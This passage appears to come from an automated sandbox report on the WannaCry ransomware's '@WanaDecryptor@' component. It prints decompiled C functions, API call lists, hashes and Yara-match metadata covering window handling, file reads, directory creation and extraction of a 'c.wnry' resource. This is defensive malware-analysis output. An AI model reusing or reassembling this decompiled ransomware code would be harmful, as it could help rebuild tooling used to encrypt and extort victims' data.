                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Color$#341#567#6140CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2603677082-0
                                                      • Opcode ID: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                                      • Instruction ID: 8505b43e8b24dba0e9a20122b4cf5018a120a2575fdff98832e5101b57525ea5
                                                      • Opcode Fuzzy Hash: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                                      • Instruction Fuzzy Hash: 7D2159B0900B449FD320DF2AC985B96FBE4FF84B14F504A2FE19687791D7B9A844CB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%


                                                      C-Code - Quality: 100%
                                                      			E0040B620(WCHAR* _a4, struct HWND__* _a8) {
                                                      				struct HWND__* _t4;
                                                      				struct HWND__* _t15;
                                                      
                                                      				_t4 = FindWindowW(0, _a4); // executed
                                                      				_t15 = _t4;
                                                      				if(_t15 != 0) {
                                                      					ShowWindow(_t15, 5);
                                                      					SetWindowPos(_t15, 0xffffffff, 0, 0, 0, 0, 0x43);
                                                      					SetWindowPos(_t15, 0xfffffffe, 0, 0, 0, 0, 0x43);
                                                      					SetForegroundWindow(_t15);
                                                      					SetFocus(_t15);
                                                      					SetActiveWindow(_t15);
                                                      					BringWindowToTop(_t15);
                                                      					_t4 = _a8;
                                                      					if(_t4 != 0) {
                                                      						ExitProcess(0);
                                                      					}
                                                      				}
                                                      				return _t4;
                                                      			}






                                                      APIs
                                                      • FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                                      • ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                                      • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                                      • SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                                      • SetForegroundWindow.USER32(00000000), ref: 0040B663
                                                      • SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                                      • SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                                      • BringWindowToTop.USER32(00000000), ref: 0040B678
                                                      • ExitProcess.KERNEL32 ref: 0040B689
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$ActiveBringExitFindFocusForegroundProcessShow
                                                      • String ID:
                                                      • API String ID: 962039509-0
                                                      • Opcode ID: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                                      • Instruction ID: 32f88169c1f0d7c0e12a36757c7a64a26434f73f58f3758d5628eaed19e7f987
                                                      • Opcode Fuzzy Hash: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                                      • Instruction Fuzzy Hash: 66F0F431245A21F7E2315B54AC0DFDF3655DFC5B21F214610F715791D4CB6455018AAD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Yara matches
                                                      Similarity
                                                      • API ID: fclose$fopenfreadfwrite
                                                      • String ID: c.wnry
                                                      • API String ID: 2140422903-3240288721
                                                      • Opcode ID: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                                      • Instruction ID: f5186b7865cb40674a519f70d39de74d6a09c830656aa5640d665e45194f203f
                                                      • Opcode Fuzzy Hash: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                                      • Instruction Fuzzy Hash: 0DF0FC31746310EBD3209B19BD09BD77A56DFC0721F450436FC0ED63A4E2799946899E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040B6A0(CHAR* _a4, CHAR* _a8, intOrPtr _a12) {
                                                      				char _v520;
                                                      				void _v816;
                                                      				struct _SECURITY_ATTRIBUTES* _v820;
                                                      				void* _t15;
                                                      				struct _SECURITY_ATTRIBUTES* _t37;
                                                      				CHAR* _t38;
                                                      				void* _t39;
                                                      				CHAR* _t40;
                                                      				struct _SECURITY_ATTRIBUTES** _t42;
                                                      				struct _SECURITY_ATTRIBUTES** _t44;
                                                      
                                                      				_t40 = _a4;
                                                      				CreateDirectoryA(_t40, 0); // executed
                                                      				_t38 = _a8;
                                                      				_t15 = E00412920(_t38, _a12);
                                                      				_t28 = _t15;
                                                      				_t42 =  &(( &_v820)[2]);
                                                      				if(_t15 != 0) {
                                                      					_v820 = 0;
                                                      					memset( &_v816, 0, 0x4a << 2);
                                                      					E00412940(_t28, 0xffffffff,  &_v820);
                                                      					_t37 = _v820;
                                                      					_t44 =  &(_t42[6]);
                                                      					if(_t37 > 0) {
                                                      						_t39 = 0;
                                                      						if(_t37 > 0) {
                                                      							do {
                                                      								E00412940(_t28, _t39,  &_v820);
                                                      								sprintf( &_v520, "%s\\%s", _t40,  &_v816);
                                                      								E004129E0(_t28, _t39,  &_v520);
                                                      								_t44 =  &(_t44[0xa]);
                                                      								_t39 = _t39 + 1;
                                                      							} while (_t39 < _t37);
                                                      						}
                                                      						E00412A00(_t28);
                                                      						return 1;
                                                      					} else {
                                                      						return 0;
                                                      					}
                                                      				} else {
                                                      					DeleteFileA(_t38);
                                                      					return 0;
                                                      				}
                                                      			}














                                                      APIs
                                                      • CreateDirectoryA.KERNELBASE(?,00000000,?,76E83310,00000000,00000428), ref: 0040B6B4
                                                      • DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                                      Strings
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateDeleteDirectoryFile
                                                      • String ID: %s\%s
                                                      • API String ID: 3195586388-4073750446
                                                      • Opcode ID: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                                      • Instruction ID: 62764616b0dad41b6f02366a4e891bd604a257d4ac44bdf0c04ae484a2ff6343
                                                      • Opcode Fuzzy Hash: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
                                                      • Instruction Fuzzy Hash: 2F2108B620435067D620AB65EC81AEB779CEBC4324F44082EFD1892242E77D661D82FA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 97%
                                                      			E004108A0(CHAR* _a4, intOrPtr _a8, char _a12, long* _a16) {
                                                      				long _t28;
                                                      				long _t30;
                                                      				void* _t34;
                                                      				signed int _t38;
                                                      				void* _t44;
                                                      				long* _t45;
                                                      				long _t46;
                                                      				char _t47;
                                                      
                                                      				_t47 = _a12;
                                                      				if(_t47 == 1 || _t47 == 2 || _t47 == 3) {
                                                      					_t45 = _a16;
                                                      					_t44 = 0;
                                                      					_t38 = 0;
                                                      					 *_t45 = 0;
                                                      					_a12 = 0;
                                                      					if(_t47 == 1) {
                                                      						_t44 = _a4;
                                                      						_a12 = 0;
                                                      						goto L10;
                                                      					} else {
                                                      						if(_t47 != 2) {
                                                      							L11:
                                                      							_push(0x20);
                                                      							L00412CEC();
                                                      							_t46 = _t28;
                                                      							if(_t47 == 1 || _t47 == 2) {
                                                      								 *_t46 = 1;
                                                      								 *((char*)(_t46 + 0x10)) = _a12;
                                                      								 *(_t46 + 1) = _t38;
                                                      								 *(_t46 + 4) = _t44;
                                                      								 *((char*)(_t46 + 8)) = 0;
                                                      								 *(_t46 + 0xc) = 0;
                                                      								if(_t38 != 0) {
                                                      									_t30 = SetFilePointer(_t44, 0, 0, 1); // executed
                                                      									 *(_t46 + 0xc) = _t30;
                                                      								}
                                                      								 *_a16 = 0;
                                                      								return _t46;
                                                      							} else {
                                                      								 *((intOrPtr*)(_t46 + 0x14)) = _a4;
                                                      								 *((intOrPtr*)(_t46 + 0x18)) = _a8;
                                                      								 *_t46 = 0;
                                                      								 *(_t46 + 1) = 1;
                                                      								 *((char*)(_t46 + 0x10)) = 0;
                                                      								 *((intOrPtr*)(_t46 + 0x1c)) = 0;
                                                      								 *(_t46 + 0xc) = 0;
                                                      								 *_a16 = 0;
                                                      								return _t46;
                                                      							}
                                                      						} else {
                                                      							_t34 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                      							_t44 = _t34;
                                                      							if(_t44 != 0xffffffff) {
                                                      								_a12 = 1;
                                                      								L10:
                                                      								_t28 = SetFilePointer(_t44, 0, 0, 1); // executed
                                                      								_t38 = _t38 & 0xffffff00 | _t28 != 0xffffffff;
                                                      								goto L11;
                                                      							} else {
                                                      								 *_t45 = 0x200;
                                                      								return 0;
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					 *_a16 = 0x10000;
                                                      					return 0;
                                                      				}
                                                      			}












                                                      APIs
                                                      • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 004108FB
                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041092C
                                                      • #823.MFC42(00000020,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041093A
                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,?,?), ref: 004109A2
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Pointer$#823Create
                                                      • String ID:
                                                      • API String ID: 3407337251-0
                                                      • Opcode ID: c0329c9cd5499b30d561a7d1ea4c749812c658726ada96262fbe16ef4aa413c9
                                                      • Instruction ID: 085c1855c78cd49c3d24b3d31d21a090ac304bae7dbf1d621fd5eca193cafac9
                                                      • Opcode Fuzzy Hash: c0329c9cd5499b30d561a7d1ea4c749812c658726ada96262fbe16ef4aa413c9
                                                      • Instruction Fuzzy Hash: BD31A3712943418FE331CF29E84179BBBE1AB85720F14891EE1D597781D3B6A4C8CBA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E00412250(CHAR* _a4, void* _a8) {
                                                      				void _v260;
                                                      				char _v520;
                                                      				long _t16;
                                                      				void* _t17;
                                                      				int _t22;
                                                      				void* _t29;
                                                      				CHAR* _t32;
                                                      				signed int _t33;
                                                      				signed int _t34;
                                                      				signed int _t36;
                                                      				signed int _t39;
                                                      				unsigned int _t46;
                                                      				signed int _t47;
                                                      				signed int _t51;
                                                      				signed int _t52;
                                                      				void* _t56;
                                                      				void* _t83;
                                                      				void* _t85;
                                                      				void* _t86;
                                                      				void* _t87;
                                                      				char* _t88;
                                                      				char* _t93;
                                                      
                                                      				_t88 =  &_v520;
                                                      				_t32 = _a4;
                                                      				if(_t32 != 0) {
                                                      					_t16 = GetFileAttributesA(_t32); // executed
                                                      					if(_t16 == 0xffffffff) {
                                                      						_t16 = CreateDirectoryA(_t32, 0);
                                                      					}
                                                      				}
                                                      				_t87 = _a8;
                                                      				_t34 =  *_t87;
                                                      				if(_t34 == 0) {
                                                      					L15:
                                                      					return _t16;
                                                      				} else {
                                                      					_t17 = _t87;
                                                      					_t56 = _t87;
                                                      					do {
                                                      						if(_t34 == 0x2f || _t34 == 0x5c) {
                                                      							_t17 = _t56;
                                                      						}
                                                      						_t34 =  *(_t56 + 1);
                                                      						_t56 = _t56 + 1;
                                                      					} while (_t34 != 0);
                                                      					if(_t17 != _t87) {
                                                      						_t86 = _t87;
                                                      						_t51 = _t17 - _t87;
                                                      						_t52 = _t51 >> 2;
                                                      						memcpy( &_v260, _t86, _t52 << 2);
                                                      						_t29 = memcpy(_t86 + _t52 + _t52, _t86, _t51 & 0x00000003);
                                                      						_t93 =  &(_t88[0x18]);
                                                      						_t34 = 0;
                                                      						_t93[_t29 + 0x114] = 0;
                                                      						E00412250(_t32,  &_v260);
                                                      						_t88 =  &(_t93[8]);
                                                      					}
                                                      					_v520 = 0;
                                                      					if(_t32 != 0) {
                                                      						asm("repne scasb");
                                                      						_t46 =  !(_t34 | 0xffffffff);
                                                      						_t85 = _t32 - _t46;
                                                      						_t47 = _t46 >> 2;
                                                      						memcpy(_t85 + _t47 + _t47, _t85, memcpy( &_v520, _t85, _t47 << 2) & 0x00000003);
                                                      						_t88 =  &(_t88[0x18]);
                                                      						_t34 = 0;
                                                      					}
                                                      					asm("repne scasb");
                                                      					_t36 =  !(_t34 | 0xffffffff);
                                                      					_t83 = _t87 - _t36;
                                                      					_t33 = _t36;
                                                      					asm("repne scasb");
                                                      					_t39 = _t33 >> 2;
                                                      					memcpy( &_v520 - 1, _t83, _t39 << 2);
                                                      					memcpy(_t83 + _t39 + _t39, _t83, _t33 & 0x00000003);
                                                      					_t16 = GetFileAttributesA( &_v520); // executed
                                                      					if(_t16 != 0xffffffff) {
                                                      						goto L15;
                                                      					} else {
                                                      						_t22 = CreateDirectoryA( &_v520, 0); // executed
                                                      						return _t22;
                                                      					}
                                                      				}
                                                      			}

























                                                      APIs
                                                      • GetFileAttributesA.KERNELBASE(?,?,?), ref: 00412264
                                                      • CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 00412338
                                                      • CreateDirectoryA.KERNELBASE(?,00000000,?,?), ref: 0041234C
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesCreateDirectoryFile
                                                      • String ID:
                                                      • API String ID: 3401506121-0
                                                      • Opcode ID: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                                      • Instruction ID: eaae320e7248a4b774ebe1124a4f316430e5356865ecc18a96ed259e18cc5035
                                                      • Opcode Fuzzy Hash: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                                      • Instruction Fuzzy Hash: 6F310331204B0847C72889389D957FFBBC6ABD4320F544B3EF966C72C1DEB989588299
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E00412A00(intOrPtr* _a4) {
                                                      				intOrPtr _t9;
                                                      				intOrPtr _t10;
                                                      				intOrPtr* _t14;
                                                      				intOrPtr _t16;
                                                      				void* _t18;
                                                      
                                                      				_t14 = _a4;
                                                      				if(_t14 != 0) {
                                                      					if( *_t14 == 1) {
                                                      						_t2 = _t14 + 4; // 0x5d5e5f01
                                                      						_t16 =  *_t2;
                                                      						 *0x4220dc = E004127A0(_t16);
                                                      						if(_t16 != 0) {
                                                      							_t9 =  *((intOrPtr*)(_t16 + 0x138));
                                                      							if(_t9 != 0) {
                                                      								_push(_t9);
                                                      								L00412C98();
                                                      								_t18 = _t18 + 4;
                                                      							}
                                                      							_t10 =  *((intOrPtr*)(_t16 + 0x13c));
                                                      							 *((intOrPtr*)(_t16 + 0x138)) = 0;
                                                      							if(_t10 != 0) {
                                                      								_push(_t10); // executed
                                                      								L00412C98(); // executed
                                                      								_t18 = _t18 + 4;
                                                      							}
                                                      							_push(_t16);
                                                      							 *((intOrPtr*)(_t16 + 0x13c)) = 0;
                                                      							L00412C98();
                                                      							_t18 = _t18 + 4;
                                                      						}
                                                      						_push(_t14); // executed
                                                      						L00412C98(); // executed
                                                      						return  *0x4220dc;
                                                      					} else {
                                                      						 *0x4220dc = 0x80000;
                                                      						return 0x80000;
                                                      					}
                                                      				} else {
                                                      					 *0x4220dc = 0x10000;
                                                      					return 0x10000;
                                                      				}
                                                      			}








                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8234c34db72d3a0399257c77a01998e30a4dd5d20ae4f1b0c75e851605a6604e
                                                      • Instruction ID: 94773d8abf21b8992377dbaff6472308c4204eb390e4227f2b12783aedecbb61
                                                      • Opcode Fuzzy Hash: 8234c34db72d3a0399257c77a01998e30a4dd5d20ae4f1b0c75e851605a6604e
                                                      • Instruction Fuzzy Hash: 070121B16016109BDA209F29EA417CBB3989F40354F08443BE545D7310F7F8E9E5CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: closesocketsendsetsockoptshutdown
                                                      • String ID:
                                                      • API String ID: 4063721217-0
                                                      • Opcode ID: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                                      • Instruction ID: 511c5ca045328faec3d78f5435f76df0282562355462c5d2c83a81ecee0c9610
                                                      • Opcode Fuzzy Hash: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                                      • Instruction Fuzzy Hash: 9D014075200B40ABD3208B28C849B97B7A5AF89721F808B2CF6A9962D0D7B4A4088795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 50%
                                                      			E004043E0(void* __ecx) {
                                                      				void* _t3;
                                                      
                                                      				_push(1);
                                                      				_push(0x100);
                                                      				_push(0);
                                                      				L00412DDC();
                                                      				_t3 = __ecx + 0x40;
                                                      				_push(_t3); // executed
                                                      				L00412DD6(); // executed
                                                      				 *((char*)(__ecx + 0x5a)) = 0;
                                                      				L00412C14();
                                                      				return _t3;
                                                      			}




                                                      APIs
                                                      • #4284.MFC42(00000000,00000100,00000001), ref: 004043EC
                                                      • #3874.MFC42(?,00000000,00000100,00000001), ref: 004043F7
                                                      • #5277.MFC42 ref: 00404402
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #3874#4284#5277
                                                      • String ID:
                                                      • API String ID: 1717392697-0
                                                      • Opcode ID: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
                                                      • Instruction ID: 168dd717f23fd29799672b21daad70d98dc1c3a6295a550393a3fd33bd33aa1c
                                                      • Opcode Fuzzy Hash: 4114d52f3e371674d2295fde4232c802f8929f5cfba066acaa82d75807d1c039
                                                      • Instruction Fuzzy Hash: B1D012303487645AE974B266BA0BBDB5A999B45B18F04044FF2459F2C1D9D858D083E5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 98%
                                                      			E00411660() {
                                                      				signed int _t57;
                                                      				signed int _t59;
                                                      				unsigned int _t65;
                                                      				intOrPtr _t66;
                                                      				signed int _t68;
                                                      				signed int _t71;
                                                      				signed char _t86;
                                                      				intOrPtr* _t100;
                                                      				void* _t101;
                                                      				signed int _t103;
                                                      				void* _t105;
                                                      				void* _t106;
                                                      				void* _t107;
                                                      				void* _t108;
                                                      
                                                      				_t100 =  *((intOrPtr*)(_t105 + 0x18));
                                                      				if(_t100 != 0) {
                                                      					__eflags =  *(_t100 + 0x18);
                                                      					if( *(_t100 + 0x18) != 0) {
                                                      						__eflags =  *(_t100 + 0x7c);
                                                      						if(__eflags != 0) {
                                                      							E00411AC0(_t100);
                                                      							_t105 = _t105 + 4;
                                                      						}
                                                      						_t57 = E00411460(__eflags, _t100, _t105 + 0x14, _t105 + 0x18, _t105 + 0xc);
                                                      						_t106 = _t105 + 0x10;
                                                      						__eflags = _t57;
                                                      						if(_t57 == 0) {
                                                      							_t101 = malloc(0x84);
                                                      							_t107 = _t106 + 4;
                                                      							__eflags = _t101;
                                                      							if(_t101 != 0) {
                                                      								_t59 = malloc(0x4000); // executed
                                                      								 *_t101 = _t59;
                                                      								 *((intOrPtr*)(_t101 + 0x44)) =  *((intOrPtr*)(_t107 + 0x1c));
                                                      								_t108 = _t107 + 4;
                                                      								__eflags = _t59;
                                                      								 *((intOrPtr*)(_t101 + 0x48)) =  *((intOrPtr*)(_t107 + 0x10));
                                                      								 *((intOrPtr*)(_t101 + 0x4c)) = 0;
                                                      								if(_t59 != 0) {
                                                      									 *((intOrPtr*)(_t101 + 0x40)) = 0;
                                                      									__eflags =  *(_t100 + 0x34);
                                                      									 *(_t101 + 0x54) =  *(_t100 + 0x3c);
                                                      									 *((intOrPtr*)(_t101 + 0x50)) = 0;
                                                      									 *(_t101 + 0x64) =  *(_t100 + 0x34);
                                                      									 *((intOrPtr*)(_t101 + 0x60)) =  *_t100;
                                                      									__eflags =  *(_t100 + 0x34) != 0;
                                                      									 *((intOrPtr*)(_t101 + 0x68)) =  *((intOrPtr*)(_t100 + 0xc));
                                                      									 *((intOrPtr*)(_t101 + 0x18)) = 0;
                                                      									if( *(_t100 + 0x34) != 0) {
                                                      										_t25 = _t101 + 4; // 0x4
                                                      										 *((intOrPtr*)(_t101 + 0x24)) = 0;
                                                      										 *((intOrPtr*)(_t101 + 0x28)) = 0;
                                                      										 *((intOrPtr*)(_t101 + 0x2c)) = 0;
                                                      										_t71 = E00410380(_t25);
                                                      										_t108 = _t108 + 4;
                                                      										__eflags = _t71;
                                                      										if(_t71 == 0) {
                                                      											 *((intOrPtr*)(_t101 + 0x40)) = 1;
                                                      										}
                                                      									}
                                                      									 *((intOrPtr*)(_t101 + 0x58)) =  *((intOrPtr*)(_t100 + 0x40));
                                                      									 *((intOrPtr*)(_t101 + 0x5c)) =  *((intOrPtr*)(_t100 + 0x44));
                                                      									 *(_t101 + 0x6c) =  *(_t100 + 0x30) & 0x00000001;
                                                      									_t86 =  *(_t100 + 0x30) >> 3;
                                                      									__eflags = _t86 & 0x00000001;
                                                      									if((_t86 & 0x00000001) == 0) {
                                                      										_t65 =  *(_t100 + 0x3c) >> 0x18;
                                                      										__eflags = _t65;
                                                      										 *(_t101 + 0x80) = _t65;
                                                      									} else {
                                                      										 *(_t101 + 0x80) =  *(_t100 + 0x38) >> 8;
                                                      									}
                                                      									_t103 =  *(_t108 + 0x20);
                                                      									_t45 = _t101 + 0x70; // 0x70
                                                      									_t79 = _t45;
                                                      									asm("sbb ecx, ecx");
                                                      									 *_t45 = 0x12345678;
                                                      									 *((intOrPtr*)(_t101 + 0x74)) = 0x23456789;
                                                      									__eflags = _t103;
                                                      									 *(_t101 + 0x7c) =  ~( *(_t101 + 0x6c)) & 0x0000000c;
                                                      									 *((intOrPtr*)(_t101 + 0x78)) = 0x34567890;
                                                      									if(_t103 != 0) {
                                                      										while(1) {
                                                      											_t68 =  *_t103;
                                                      											__eflags = _t68;
                                                      											if(_t68 == 0) {
                                                      												goto L21;
                                                      											}
                                                      											E004100D0(_t79, _t68);
                                                      											_t108 = _t108 + 8;
                                                      											_t103 = _t103 + 1;
                                                      											__eflags = _t103;
                                                      											if(_t103 != 0) {
                                                      												continue;
                                                      											}
                                                      											goto L21;
                                                      										}
                                                      									}
                                                      									L21:
                                                      									_t66 =  *((intOrPtr*)(_t108 + 0x14));
                                                      									 *((intOrPtr*)(_t101 + 8)) = 0;
                                                      									_t53 = _t66 + 0x1e; // 0x345678ae
                                                      									__eflags = 0;
                                                      									 *((intOrPtr*)(_t101 + 0x3c)) =  *((intOrPtr*)(_t100 + 0x78)) + _t53;
                                                      									 *(_t100 + 0x7c) = _t101;
                                                      									return 0;
                                                      								} else {
                                                      									free(_t101);
                                                      									return 0xffffff98;
                                                      								}
                                                      							} else {
                                                      								return 0xffffff98;
                                                      							}
                                                      						} else {
                                                      							return 0xffffff99;
                                                      						}
                                                      					} else {
                                                      						return 0xffffff9a;
                                                      					}
                                                      				} else {
                                                      					return 0xffffff9a;
                                                      				}
                                                      			}


















                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00410AF0(long _a4, signed int _a8, char _a12, char _a16) {
                                                      				long _t26;
                                                      				signed int _t28;
                                                      				int _t31;
                                                      				intOrPtr* _t34;
                                                      				intOrPtr _t36;
                                                      				signed int _t37;
                                                      				signed int _t38;
                                                      				intOrPtr _t47;
                                                      				void* _t64;
                                                      				signed int _t66;
                                                      
                                                      				_t1 =  &_a16; // 0x410d5a
                                                      				_t34 =  *_t1;
                                                      				_t66 = _a8;
                                                      				_t3 =  &_a12; // 0x410d5a
                                                      				_t26 = _t66 *  *_t3;
                                                      				if( *_t34 == 0) {
                                                      					_t47 =  *((intOrPtr*)(_t34 + 0x1c));
                                                      					_t36 =  *((intOrPtr*)(_t34 + 0x18));
                                                      					if(_t47 + _t26 > _t36) {
                                                      						_t26 = _t36 - _t47;
                                                      					}
                                                      					_t17 =  &_a4; // 0x410d5a
                                                      					_t37 = _t26;
                                                      					_t64 =  *((intOrPtr*)(_t34 + 0x14)) + _t47;
                                                      					_t38 = _t37 >> 2;
                                                      					memcpy( *_t17, _t64, _t38 << 2);
                                                      					_t28 = memcpy(_t64 + _t38 + _t38, _t64, _t37 & 0x00000003);
                                                      					 *((intOrPtr*)(_t34 + 0x1c)) =  *((intOrPtr*)(_t34 + 0x1c)) + _t28;
                                                      					return _t28 / _t66;
                                                      				} else {
                                                      					_t31 = ReadFile( *(_t34 + 4), _a4, _t26,  &_a4, 0); // executed
                                                      					if(_t31 == 0) {
                                                      						 *((char*)(_t34 + 8)) = 1;
                                                      					}
                                                      					return _a4 / _t66;
                                                      				}
                                                      			}














                                                      APIs
                                                      • ReadFile.KERNELBASE(000000FF,00000404,ZA,00000404,00000000,00000000,0000FFFF,00410D5A,00000000,00000404,00000001,?), ref: 00410B18
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: ZA
                                                      • API String ID: 2738559852-706706751
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 28%
                                                      			E004133E6(void* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
                                                      
                                                      				_t1 =  &_a16; // 0x413236
                                                      				_push( *_t1);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				L0041343E(); // executed
                                                      				return __eax;
                                                      			}




                                                      APIs
